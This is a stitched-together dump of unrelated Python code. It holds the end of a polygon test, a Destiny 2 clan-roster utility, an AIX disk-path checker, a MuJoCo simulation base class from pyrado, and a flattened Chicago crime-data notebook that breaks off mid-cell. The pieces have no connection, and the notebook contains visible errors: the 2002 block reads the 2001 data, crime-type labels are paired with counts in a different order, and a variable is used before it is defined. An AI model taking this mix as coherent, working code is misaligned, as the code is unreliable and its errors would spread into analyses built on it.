            Pg([(1, 2), (1, 4), (2, 4), (2, 2), (1, 2)]),
            Pg([(4, 2), (4, 4), (5, 4), (5, 2), (4, 2)]),
        ])
        # NOTE(review): no assertion follows this `exp` in the source —
        # the multiple-polygon case is built but never checked; an
        # `assertEqual(f(b), exp)` appears to be missing here.
        # Single polygon, including boundary segments
        b = L((2, 1), (3, 1))
        exp = Pg([(1, 0), (1, 1), (5, 1), (5, 0), (1, 0)])
        self.assertEqual(f(b), exp)
        # Multiple boundary segments
        b = L((3, 4), (2, 4))
        exp = ML((L((1, 4), (2, 4)), L((4, 4), (5, 4))))
        self.assertEqual(f(b), exp)
        # Single polygon that includes the start point
        b = L((1, 1), (2, 0))
        exp = Pg([(1, 0), (1, 1), (2, 0), (1, 0)])
        # NOTE(review): the source is truncated at this point — the final
        # assertion for this case is missing from this copy of the file.
import asyncio
import datetime as dt
import json
import logging
import os
from typing import Optional

import aiohttp
import pydest

logger = logging.getLogger("d2util")


def str_to_datetime(date_time: str) -> dt.datetime:
    """Parse an ISO-8601 date-time string into a :class:`datetime.datetime`."""
    return dt.datetime.fromisoformat(date_time)


def get_bungie_name(group_member: dict) -> Optional[str]:
    """Build the 'Name#Code' Bungie name from a clan-roster entry.

    :param group_member: one entry from the GroupV2 members response
    :return: the global display name joined with its numeric code, or ``None``
             when the entry has no global display name/code.
    """
    user_info = group_member["destinyUserInfo"]
    if user_info["bungieGlobalDisplayName"] and user_info.get("bungieGlobalDisplayNameCode") is not None:
        return f"{user_info['bungieGlobalDisplayName']}#{user_info['bungieGlobalDisplayNameCode']}"
    # FIX: the original ended with a bare `pass`, implicitly returning None while
    # annotated `-> str`; make the None return explicit and annotate Optional.
    return None


class ClanUtil:
    """Helpers around the Bungie.Net GroupV2 / Destiny 2 APIs for a single clan."""

    def __init__(self, api_key: str, group_id: int, members_data_path: str = "members.json", loop=None):
        # NOTE: the original declared `-> (list, list)` on __init__, which is
        # meaningless (constructors return None); the annotation was removed.
        self.destiny = pydest.Pydest(api_key, loop)
        # Workaround: Korean ('ko') is missing from pydest's manifest language
        # table, so register an empty placeholder.
        self.destiny._manifest.manifest_files["ko"] = ""
        self.group_id = group_id
        self.members_data_path = members_data_path
        # In-memory copy of the last roster fetched from the API.
        self.members_data_cache = []
        # Seed the on-disk cache with an empty JSON list on first run.
        if not os.path.exists(members_data_path):
            with open(members_data_path, "w", encoding="utf-8") as f:
                f.write("[]")

    def find_member_from_cache(self, bungie_name: str = None, membership_id: int = None) -> dict:
        """Look up a cached roster entry by Bungie name or membership id.

        :return: the matching member dict, or ``{}`` when no entry matches.
        """
        for member in self.members_data_cache:
            if bungie_name and bungie_name == get_bungie_name(member):
                return member
            if membership_id and membership_id == member["destinyUserInfo"]["membershipId"]:
                return member
        return {}

    async def member_diff(self, cmp_file_path="members.json"):
        """Detect clan joins/leaves since the last snapshot.

        :param cmp_file_path: JSON file holding the previous roster snapshot
        :return: ``(list_joined, list_leaved)`` — full member records of members
                 who joined resp. left since the last call.
        """
        # Request the current roster from the Bungie API server.
        resp = await self.destiny.api.get_members_of_group(self.group_id)
        raw_new: list = resp["Response"]["results"]

        # Prefer the in-memory snapshot; fall back to the file on disk.
        if self.members_data_cache:
            raw_old: list = self.members_data_cache
        else:
            with open(cmp_file_path, "r", encoding="utf-8") as f:
                raw_old: list = json.load(f)

        # If the snapshot is empty too, just persist the new roster and report
        # no changes (avoids flagging the entire clan as "joined").
        if not raw_old:
            with open(cmp_file_path, "w", encoding="utf-8") as f:
                json.dump(raw_new, f, ensure_ascii=False, indent=2)
            return [], []

        # Convert to membership-id sets and detect changes.
        set_new = set(n["destinyUserInfo"]["membershipId"] for n in raw_new)
        set_old = set(n["destinyUserInfo"]["membershipId"] for n in raw_old)
        set_joined = set_new - set_old
        set_leaved = set_old - set_new

        # Collect the full records of the affected members.
        list_joined = [n for n in raw_new if n["destinyUserInfo"]["membershipId"] in set_joined]
        list_leaved = [n for n in raw_old if n["destinyUserInfo"]["membershipId"] in set_leaved]

        # Persist the new roster to both memory and disk.
        self.members_data_cache = raw_new
        with open(cmp_file_path, "w", encoding="utf-8") as f:
            json.dump(raw_new, f, ensure_ascii=False, indent=2)

        # Return the detected joins/leaves.
        return list_joined, list_leaved

    async def members_offline_time(self, cut_day=21) -> list:
        """Return members whose last online status change is older than *cut_day* days."""
        # Fetch the clan roster.
        resp = await self.destiny.api.get_members_of_group(self.group_id)
        members: list = resp["Response"]["results"]
        # Build the cutoff timestamp (UTC, seconds).
        today = dt.datetime.utcnow().timestamp()
        cut_line = today - cut_day * 86400
        target = [n for n in members if int(n["lastOnlineStatusChange"]) < cut_line]
        # Sort oldest-first for readability.
        target.sort(key=lambda x: x["lastOnlineStatusChange"])
        return target

    async def online_members(self):
        """Return an iterator over roster entries currently flagged online."""
        resp = await self.destiny.api.get_members_of_group(self.group_id)
        members: list = resp["Response"]["results"]
        online = filter(lambda x: x.get("isOnline"), members)
        return online

    async def user_activity(self, membership_type: int, membership_id: int) -> tuple:
        """Describe a member's current in-game activity.

        :return: a 1-tuple with a status string, or a 2-tuple of
                 (activity mode name, activity name) when in an activity.
        """
        try:
            resp = await asyncio.wait_for(
                self.destiny.api.get_profile(membership_type, membership_id, [204]), timeout=10
            )
        except asyncio.TimeoutError:
            logger.warning(f"{membership_id} / Request Timeout")
            return "온라인(시간 초과)",

        # API-level error.
        if not resp.get("Response") or resp.get("ErrorCode") != 1:
            logger.warning(f"{membership_id} / {resp.get('ErrorCode', 'Wrong response form')}")
            return "온라인(응답 오류)",
        if not resp['Response']['characterActivities'].get('data'):
            return "온라인",

        # Pick the most recently started character activity.
        recent = sorted(resp['Response']['characterActivities']['data'].values(),
                        key=lambda x: x["dateActivityStarted"])[-1]
        if not recent["currentActivityHash"]:
            return "온라인",

        activity = await self.destiny.decode_hash(recent["currentActivityHash"],
                                                  "DestinyActivityDefinition", language="ko")
        if not activity["displayProperties"]["name"]:
            # Empty activity name means the player is in orbit.
            return "궤도",

        try:
            activity_mode = await self.destiny.decode_hash(recent["currentActivityModeHash"],
                                                           "DestinyActivityModeDefinition", language="ko")
        except pydest.pydest.PydestException:
            # Some activities carry no mode hash; fall back to the activity type.
            activity_mode = await self.destiny.decode_hash(activity["activityTypeHash"],
                                                           "DestinyActivityTypeDefinition", language="ko")
        return activity_mode["displayProperties"]["name"], activity["displayProperties"]["name"]

    async def is_member_in_clan(self, bungie_name: str, membership_id: int = 0) -> dict:
        """Return the cached roster entry for the given name or id, or ``{}``."""
        if bungie_name:
            matches = [n for n in self.members_data_cache if get_bungie_name(n) == bungie_name]
            return matches[0] if matches else {}
        if membership_id:
            matches = [n for n in self.members_data_cache
                       if int(n["destinyUserInfo"]["membershipId"]) == membership_id]
            # FIX: the original tested `membership_id in matches`, i.e. an int
            # against a list of member dicts — always False, so the id path
            # could never return a match.
            return matches[0] if matches else {}
        return {}
#!/usr/bin/python3
#######################################################################
################### Check the AIX system disk path! ###################
#######################################################################

import os


class PathCheck:
    """Inspect AIX ``lspath`` output for disk paths in abnormal states
    (disable / defined / missing / failed)."""

    # Base command; a case-insensitive grep for the state is appended.
    _LSPATH_CMD = 'lspath -F "name status path_id parent connection"'

    # The four abnormal path states this checker knows about, in report order.
    _STATES = ('disable', 'defined', 'missing', 'failed')

    def _state_check(self, state):
        """Return a list of path dicts whose status matches *state*, or the
        message 'No <state> path was found.' when none match.

        The original code ran the shell command twice (once to test for empty
        output, once to iterate); this runs it once and reuses the output.
        """
        cmd = self._LSPATH_CMD + '|grep -i ' + state
        output = os.popen(cmd).read()
        if len(output) == 0:
            return 'No ' + state + ' path was found.'
        path_list = []
        for line in output.splitlines():
            # lspath -F emits five single-space-separated fields per path.
            fields = line.strip().split(' ')
            path_list.append({'name': fields[0],
                              'status': fields[1],
                              'path_id': fields[2],
                              'parent': fields[3],
                              'connection': fields[4]})
        return path_list

    def disable_check(self):
        """Check the disable paths in the system."""
        return self._state_check('disable')

    def defined_check(self):
        """Check the defined paths in the system."""
        return self._state_check('defined')

    def missing_check(self):
        """Check the missing paths in the system."""
        return self._state_check('missing')

    def failed_check(self):
        """Check the failed paths in the system."""
        return self._state_check('failed')

    def result_sort(self):
        """Collect all four checks into a list of {'name', 'result'} dicts."""
        return [{'name': state, 'result': self._state_check(state)}
                for state in self._STATES]
# Copyright (c) 2020, <NAME>, Honda Research Institute Europe GmbH, and # Technical University of Darmstadt. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # 3. Neither the name of <NAME>, Honda Research Institute Europe GmbH, # or Technical University of Darmstadt, nor the names of its contributors may # be used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL <NAME>, HONDA RESEARCH INSTITUTE EUROPE GMBH, # OR TECHNICAL UNIVERSITY OF DARMSTADT BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. 
from abc import ABC, abstractmethod
from copy import deepcopy
from math import floor
from typing import Optional

import mujoco_py
import numpy as np
from init_args_serializer import Serializable
from mujoco_py.generated.const import RND_FOG

import pyrado
from pyrado.environments.sim_base import SimEnv
from pyrado.spaces.base import Space
from pyrado.tasks.base import Task
from pyrado.utils.data_types import RenderMode
from pyrado.utils.input_output import print_cbt


class MujocoSimEnv(SimEnv, ABC, Serializable):
    """
    Base class for MuJoCo environments.
    Uses Serializable to facilitate proper serialization.

    .. seealso::
        https://github.com/openai/gym/blob/master/gym/envs/mujoco/mujoco_env.py
    """

    def __init__(
        self,
        model_path: str,
        frame_skip: int = 1,
        dt: Optional[float] = None,
        max_steps: int = pyrado.inf,
        task_args: Optional[dict] = None,
    ):
        """
        Constructor

        :param model_path: path to the MuJoCo xml model config file
        :param frame_skip: number of simulation frames for which the same action is held, results in a multiplier of
                           the time step size `dt`
        :param dt: by default the time step size is the one from the mujoco config file multiplied by the number of
                   frame skips (legacy from OpenAI environments). By passing an explicit `dt` value, this can be
                   overwritten. Possible use case is if you know that you recorded a trajectory with a specific `dt`.
        :param max_steps: max number of simulation time steps
        :param task_args: arguments for the task construction, e.g `dict(fwd_rew_weight=1.)`
        :raises pyrado.ValueErr: if the explicit `dt` is smaller than the solver's time step size
        :raises pyrado.TypeErr: if `task_args` is neither a dict nor None
        """
        Serializable._init(self, locals())

        # Initialize
        self.model_path = model_path
        self._domain_param = self.get_nominal_domain_param()

        if dt is None:
            # Specify the time step size as a multiple of MuJoCo's simulation time step size
            self.frame_skip = frame_skip
        else:
            # Specify the time step size explicitly
            with open(self.model_path, mode="r") as file_raw:
                xml_model_temp = file_raw.read()
            xml_model_temp = self._adapt_model_file(xml_model_temp, self.domain_param)
            # Create a dummy model to extract the solver's time step size
            model_tmp = mujoco_py.load_model_from_xml(xml_model_temp)
            frame_skip = dt / model_tmp.opt.timestep
            if frame_skip.is_integer():
                self.frame_skip = int(frame_skip)
            elif dt > model_tmp.opt.timestep:
                print_cbt(
                    f"The desired time step size is {dt} s, but solver's time step size in the MuJoCo config file is "
                    f"{model_tmp.opt.timestep} s. Thus, frame_skip is rounded down to {floor(frame_skip)}.",
                    "y",
                )
                self.frame_skip = floor(frame_skip)
            else:
                # The number of skipped frames must be >= 1.
                # BUGFIX: the exception was constructed but never raised, so an invalid dt silently left
                # self.frame_skip unset and crashed later with an unrelated AttributeError.
                raise pyrado.ValueErr(given=dt, ge_constraint=model_tmp.opt.timestep)

        # Create the MuJoCo model
        with open(self.model_path, mode="r") as file_raw:
            # Save raw (with placeholders) XML-file as attribute since we need it for resetting the domain params
            self.xml_model_template = file_raw.read()
        self._create_mujoco_model()

        # Call SimEnv's constructor
        super().__init__(dt=self.model.opt.timestep * self.frame_skip, max_steps=max_steps)

        # Memorize the initial states of the model from the xml (for fixed init space or later reset)
        self.init_qpos = self.sim.data.qpos.copy()
        self.init_qvel = self.sim.data.qvel.copy()

        # Initialize space (to be overwritten in constructor of subclasses)
        self._init_space = None

        # Create task
        if not (isinstance(task_args, dict) or task_args is None):
            raise pyrado.TypeErr(given=task_args, expected_type=dict)
        self.task_args = dict() if task_args is None else task_args
        self._task = self._create_task(self.task_args)

        # Visualization
        self.camera_config = dict()
        self.viewer = None
        self._curr_act = np.zeros(self.act_space.shape)

    @property
    @abstractmethod
    def state_space(self) -> Space:
        raise NotImplementedError

    @property
    @abstractmethod
    def obs_space(self) -> Space:
        raise NotImplementedError

    @property
    @abstractmethod
    def act_space(self) -> Space:
        raise NotImplementedError

    @property
    def init_space(self) -> Space:
        return self._init_space

    @init_space.setter
    def init_space(self, space: Space):
        if not isinstance(space, Space):
            raise pyrado.TypeErr(given=space, expected_type=Space)
        self._init_space = space

    @property
    def task(self) -> Task:
        return self._task

    @abstractmethod
    def _create_task(self, task_args: dict) -> Task:
        # Needs to be implemented by subclasses
        raise NotImplementedError

    @property
    def domain_param(self) -> dict:
        # Return a deep copy so callers cannot mutate the internal dict in place
        return deepcopy(self._domain_param)

    @domain_param.setter
    def domain_param(self, domain_param: dict):
        if not isinstance(domain_param, dict):
            raise pyrado.TypeErr(given=domain_param, expected_type=dict)
        # Update the parameters
        self._domain_param.update(domain_param)

        # Update MuJoCo model
        self._create_mujoco_model()

        if self.viewer is not None:
            # If the viewer already exists and we reset the domain parameters, we must also recreate the viewer since
            # it references the simulation object which gets reconstructed during _create_mujoco_model()
            import glfw

            glfw.destroy_window(self.viewer.window)
            self.viewer = None

        # Update task
        self._task = self._create_task(self.task_args)

    def _adapt_model_file(self, xml_model: str, domain_param: dict) -> str:
        """
        Changes the model's XML-file given the current domain parameters before constructing the MuJoCo simulation.
        One use case is for example the cup_scale for the `WAMBallInCupSim` where multiple values in the model's
        XML-file are changed based on one domain parameter.

        .. note::
            It is mandatory to call this function in case you modified the xml config file with tags like `[DP_NAME]`.

        :param xml_model: parsed model file
        :param domain_param: copy of the environments domain parameters
        :return: adapted model file where the placeholders are filled with numerical values
        """
        # The mesh dir is not resolved when later passed as a string, thus we do it manually
        xml_model = xml_model.replace("[ASSETS_DIR]", pyrado.MUJOCO_ASSETS_DIR)

        # Replace all occurrences of the domain parameter placeholder with its value
        for key, value in domain_param.items():
            xml_model = xml_model.replace(f"[{key}]", str(value))
        return xml_model

    @abstractmethod
    def _mujoco_step(self, act: np.ndarray) -> dict:
        """
        Apply the given action to the MuJoCo simulation. This executes one step of the physics simulation.

        :param act: action
        :return: dictionary with optional information from MuJoCo
        """

    def _create_mujoco_model(self):
        """
        Called to update the MuJoCo model by rewriting and reloading the XML file.

        .. note::
            This function is called from the constructor and from the domain parameter setter.
        """
        xml_model = self.xml_model_template  # don't change the template
        xml_model = self._adapt_model_file(xml_model, self.domain_param)

        # Create MuJoCo model from parsed XML file
        self.model = mujoco_py.load_model_from_xml(xml_model)
        self.sim = mujoco_py.MjSim(self.model, nsubsteps=self.frame_skip)

    def configure_viewer(self):
        """Configure the camera when the viewer is initialized. You need to set `self.camera_config` before."""
        # Render a fog around the scene by default
        if self.camera_config.pop("render_fog", True):
            self.viewer.scn.flags[RND_FOG] = 1

        # Parse all other options
        for key, value in self.camera_config.items():
            if isinstance(value, np.ndarray):
                getattr(self.viewer.cam, key)[:] = value
            else:
                setattr(self.viewer.cam, key, value)

    def reset(self, init_state: np.ndarray = None, domain_param: dict = None) -> np.ndarray:
        # Reset time
        self._curr_step = 0

        # Reset the domain parameters
        if domain_param is not None:
            self.domain_param = domain_param

        # Sample or set the initial simulation state
        if init_state is None:
            # Sample init state from init state space
            init_state = self.init_space.sample_uniform()
        elif not isinstance(init_state, np.ndarray):
            # Make sure init state is a numpy array
            try:
                init_state = np.asarray(init_state)
            except Exception:
                raise pyrado.TypeErr(given=init_state, expected_type=np.ndarray)

        if not self.init_space.contains(init_state, verbose=True):
            raise pyrado.ValueErr(msg="The init state must be within init state space!")

        # Update the state attribute
        self.state = init_state.copy()

        # Reset the task which also resets the reward function if necessary
        self._task.reset(env_spec=self.spec, init_state=init_state.copy())

        # Reset MuJoCo simulation model (only reset the joint configuration)
        self.sim.reset()
        old_state = self.sim.get_state()
        nq = self.model.nq
        nv = self.model.nv
        if not init_state[:nq].shape == old_state.qpos.shape:  # check joint positions dimension
            raise pyrado.ShapeErr(given=init_state[:nq], expected_match=old_state.qpos)
        # Exclude everything that is appended to the state (at the end), e.g. the ball position for WAMBallInCupSim
        if not init_state[nq : nq + nv].shape == old_state.qvel.shape:  # check joint velocities dimension
            raise pyrado.ShapeErr(given=init_state[nq : nq + nv], expected_match=old_state.qvel)
        new_state = mujoco_py.MjSimState(
            # Exclude everything that is appended to the state (at the end), e.g. the ball position for WAMBallInCupSim
            old_state.time,
            init_state[:nq],
            init_state[nq : nq + nv],
            old_state.act,
            old_state.udd_state,
        )
        self.sim.set_state(new_state)
        self.sim.forward()

        # Return an observation
        return self.observe(self.state)

    def step(self, act: np.ndarray) -> tuple:
        # Current reward depending on the state (before step) and the (unlimited) action
        remaining_steps = self._max_steps - (self._curr_step + 1) if self._max_steps is not pyrado.inf else 0
        self._curr_rew = self.task.step_rew(self.state, act, remaining_steps)

        # Apply actuator limits
        act = self.limit_act(act)
        self._curr_act = act  # just for the render function

        # Apply the action and simulate the resulting dynamics
        info = self._mujoco_step(act)
        self._curr_step += 1

        # Check if the environment is done due to a failure within the mujoco simulation (e.g. bad inputs)
        mjsim_done = info.get("failed", False)

        # Check if the task is done
        task_done = self._task.is_done(self.state)

        # Handle done case
        done = mjsim_done or task_done
        if self._curr_step >= self._max_steps:
            done = True

        if done:
            # Add final reward if done
            self._curr_rew += self._task.final_rew(self.state, remaining_steps)

        return self.observe(self.state), self._curr_rew, done, info

    def render(self, mode: RenderMode = RenderMode(), render_step: int = 1):
        if self._curr_step % render_step == 0:
            # Call base class
            super().render(mode)

            # Print to console
            if mode.text:
                print(
                    f"step: {self._curr_step:4d} | r_t: {self._curr_rew: 1.3f} | a_t: {self._curr_act} | s_t+1: {self.state}"
                )

            # Forward to MuJoCo viewer
            if mode.video:
                if self.viewer is None:
                    # Create viewer if not existent (see 'human' mode of OpenAI Gym's MujocoEnv)
                    self.viewer = mujoco_py.MjViewer(self.sim)

                    # Adjust window size and position to custom values
                    import glfw

                    glfw.make_context_current(self.viewer.window)
                    glfw.set_window_size(self.viewer.window, 1280, 720)
                    glfw.set_window_pos(self.viewer.window, 50, 50)

                    self.configure_viewer()
                self.viewer.render()
<filename>Crime_Chicago_Prediction_Final.py #!/usr/bin/env python # coding: utf-8 # In[2]: import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns from sklearn.metrics import mean_squared_error, r2_score from sklearn.linear_model import LinearRegression from sklearn.model_selection import train_test_split import os ##import pandas_profiling import folium import webbrowser from PIL import Image #pandas_profiling.ProfileReport(USA_Housing) # In[3]: ## Import Directory # In[4]: link="Dataset Location(Directory)" dirlist=os.listdir(link) print(dirlist) # ## Import Data # In[5]: c0104=pd.read_csv(link+dirlist[1]) c0507=pd.read_csv(link+dirlist[2]) c0811=pd.read_csv(link+dirlist[3]) c1217=pd.read_csv(link+dirlist[4]) c1719=pd.read_csv(link+dirlist[6]) # In[6]: c0104.columns # ## Creating Data Profile # In[80]: #pandas_profiling.ProfileReport(c0104) # In[81]: #pandas_profiling.ProfileReport(c0507) # In[82]: #pandas_profiling.ProfileReport(c0811) # In[83]: #pandas_profiling.ProfileReport(c1217) # ## Data Cleaning # In[100]: c0811.head() # In[7]: c0104smooth=c0104.dropna(axis=1) c0104smooth.isna().sum() c0104smooth=c0104smooth[1:] print(len(c0104smooth)) c0104.describe().to_csv(link+"des.csv") # In[8]: c0507smooth=c0507.dropna(axis=1) c0507smooth.isna().sum() c0507smooth=c0507smooth[1:] print(len(c0507smooth)) c0507.describe().to_csv(link+"des1.csv") # In[108]: c0811smooth=c0811.dropna(axis=1) c0811smooth.isna().sum() c0811smooth=c0811smooth[1:] print(len(c0811smooth)) c0811.describe().to_csv(link+"des2.csv") c0811smooth.head() # In[10]: c1217smooth=c1217.dropna(axis=1) c1217smooth.isna().sum() c1217smooth=c1217smooth[1:] print(len(c1217smooth)) c1217.describe().to_csv(link+"des3.csv") # ## Subsetting # In[11]: c1=c0104smooth.columns.tolist() c0104smooth=c0104smooth[c1[1:]] c0104smooth.head() # In[12]: c2=c0507smooth.columns.tolist() c0507smooth=c0507smooth[c2[1:]] c0507smooth.head() # In[13]: c3=c0811smooth.columns.tolist() 
c0811smooth=c0811smooth[c3[1:]] c0811smooth.head() # In[14]: c4=c1217smooth.columns.tolist() c1217smooth=c1217smooth[c4[1:]] c1217smooth.head() c5=c1719smooth.columns.tolist() c1719smooth=c1719smooth c1719smooth.head() c1719smooth.columns # ## Primary Analysis # In[ ]: # In[16]: c0104arr=np.array(c0104smooth['Primary Type']) c0104u=np.unique(c0104arr) # In[17]: c0104key=np.unique(np.array(np.array(c0104smooth['Primary Type']))) c0104val=np.array(c0104smooth['Primary Type'].value_counts().values) print(c0104u[:8]) print(c0104val[:8]) # In[18]: color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2001-2004 Max: {}={}".format(c0104u[:8][0],c0104val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c0104u[:8],c0104val[:8],color=color,width=0.5) # In[19]: c0507arr=np.array(c0507smooth['Primary Type']) c0507u=np.unique(c0507arr) c0507key=np.unique(np.array(np.array(c0507smooth['Primary Type']))) c0507val=np.array(c0507smooth['Primary Type'].value_counts().values) print(c0507u[:8]) print(c0507val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2005-2007 Max: {}={}".format(c0507u[:8][0],c0507val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c0507u[:8],c0507val[:8],color=color,width=0.5) # In[20]: c0811arr=np.array(c0811smooth['Primary Type']) c0811u=np.unique(c0811arr) c0811key=np.unique(np.array(np.array(c0811smooth['Primary Type']))) c0811val=np.array(c0811smooth['Primary Type'].value_counts().values) print(c0811u[:8]) print(c0811val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2008-2011 Max: {}={}".format(c0811u[:8][0],c0811val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() 
plt.bar(c0811u[:8],c0811val[:8],color=color,width=0.5) # In[21]: c1217arr=np.array(c1217smooth['Primary Type']) c1217u=np.unique(c1217arr) c1217key=np.unique(np.array(np.array(c1217smooth['Primary Type']))) c1217val=np.array(c1217smooth['Primary Type'].value_counts().values) print(c1217u[:8]) print(c1217val[:8]) color='cmykrgb' plt.figure(figsize=(30,9)) plt.title("Crime Scenario of 2012-2017 Max: {}={}".format(c1217u[:8][0],c1217val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c1217u[:8],c1217val[:8],color=color,width=0.5) # In[47]: for i in range(len(c0104val[:8])): val=[c0104val[:8][i],c0507val[:8][i],c0811val[:8][i],c1217val[:8][i]] year=['2001-2004','2005-2007','2008-2011','2012-2017'] color='cmykrgb' plt.figure(figsize=(18,7)) plt.title("Crime Scenario of {}".format(c1217u[:8][i]),fontsize=20,color='m') plt.xlabel("Crime Year->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(year,val,color=color,width=0.5) plt.savefig("C:/Users/maiti/OneDrive/Desktop/crimes-in-chicago/viz/"+c1217u[:8][i]) # ### 2001 # In[24]: c01=c0104smooth[c0104smooth['Year']==2001] c01=c01[c01.columns.tolist()[1:]] c01.head() c01arr=np.array(c01['Primary Type']) c01u=np.unique(c01arr) c01key=np.unique(np.array(np.array(c01['Primary Type']))) c01val=np.array(c01['Primary Type'].value_counts().values) print(c01u[:8]) print(c01val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2001 Max: {}={}".format(c01u[:8][0],c01val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c01u[:8],c01val[:8],color=color,width=0.5) # ### 2002 # In[25]: c02=c0104smooth[c0104smooth['Year']==2002] c02=c02[c02.columns.tolist()[1:]] c02.head() c02arr=np.array(c01['Primary Type']) c02u=np.unique(c02arr) 
c02key=np.unique(np.array(np.array(c02['Primary Type']))) c02val=np.array(c02['Primary Type'].value_counts().values) print(c02u[:8]) print(c02val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2002 Max: {}={}".format(c02u[:8][0],c02val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c02u[:8],c02val[:8],color=color,width=0.5) # ### 2003 # In[26]: c03=c0104smooth[c0104smooth['Year']==2003] c03=c03[c03.columns.tolist()[1:]] c03.head() c03arr=np.array(c03['Primary Type']) c03u=np.unique(c03arr) c03key=np.unique(np.array(np.array(c03['Primary Type']))) c03val=np.array(c03['Primary Type'].value_counts().values) print(c03u[:8]) print(c03val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2003 Max: {}={}".format(c03u[:8][0],c03val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c03u[:8],c03val[:8],color=color,width=0.5) # ### 2004 # In[27]: c04=c0104smooth[c0104smooth['Year']==2004] c04=c04[c04.columns.tolist()[1:]] c04.head() c04arr=np.array(c04['Primary Type']) c04u=np.unique(c04arr) c04key=np.unique(np.array(np.array(c04['Primary Type']))) c04val=np.array(c04['Primary Type'].value_counts().values) print(c04u[:8]) print(c04val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2004 Max: {}={}".format(c04u[:8][0],c04val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c04u[:8],c04val[:8],color=color,width=0.5) # ### 2005 # In[28]: c05=c0507smooth[c0507smooth['Year']==2005] c05=c05[c05.columns.tolist()[1:]] c05.head() c05arr=np.array(c05['Primary Type']) c05u=np.unique(c05arr) c05key=np.unique(np.array(np.array(c05['Primary Type']))) c05val=np.array(c05['Primary 
Type'].value_counts().values)
# --- Notebook-export residue: per-year "top 8 crime types" bar charts. ---
# Each year block below: filter the *smooth frame by Year, drop the first
# (index) column, then derive labels and counts for a bar chart.
# NOTE(review): cXXu comes from np.unique (alphabetical order) while cXXval
# comes from value_counts().values (descending by count) — the bar labels
# and heights are therefore probably misaligned; confirm intent.
print(c05u[:8])
print(c05val[:8])
color='cmykrgb'  # one matplotlib color code per bar
plt.figure(figsize=(20,7))
plt.title("Crime Scenario of 2005 Max: {}={}".format(c05u[:8][0],c05val[:8][0]),fontsize=20,color='m')
plt.xlabel("Crime Type->",fontsize=15,color='b')
plt.ylabel("Crime Occured->",fontsize=15,color='b')
plt.grid()
plt.bar(c05u[:8],c05val[:8],color=color,width=0.5)
# ### 2006
# In[29]:
c06=c0507smooth[c0507smooth['Year']==2006]
c06=c06[c06.columns.tolist()[1:]]  # drop first column
c06.head()
c06arr=np.array(c06['Primary Type'])
c06u=np.unique(c06arr)  # unique crime types, alphabetical
c06key=np.unique(np.array(np.array(c06['Primary Type'])))  # duplicate of c06u (redundant double np.array)
c06val=np.array(c06['Primary Type'].value_counts().values)  # counts, descending
print(c06u[:8])
print(c06val[:8])
color='cmykrgb'
plt.figure(figsize=(20,7))
plt.title("Crime Scenario of 2006 Max: {}={}".format(c06u[:8][0],c06val[:8][0]),fontsize=20,color='m')
plt.xlabel("Crime Type->",fontsize=15,color='b')
plt.ylabel("Crime Occured->",fontsize=15,color='b')
plt.grid()
plt.bar(c06u[:8],c06val[:8],color=color,width=0.5)
# ### 2007
# In[30]:
c07=c0507smooth[c0507smooth['Year']==2007]
c07=c07[c07.columns.tolist()[1:]]
c07.head()
c07arr=np.array(c07['Primary Type'])
c07u=np.unique(c07arr)
c07key=np.unique(np.array(np.array(c07['Primary Type'])))
c07val=np.array(c07['Primary Type'].value_counts().values)
print(c07u[:8])
print(c07val[:8])
color='cmykrgb'
plt.figure(figsize=(20,7))
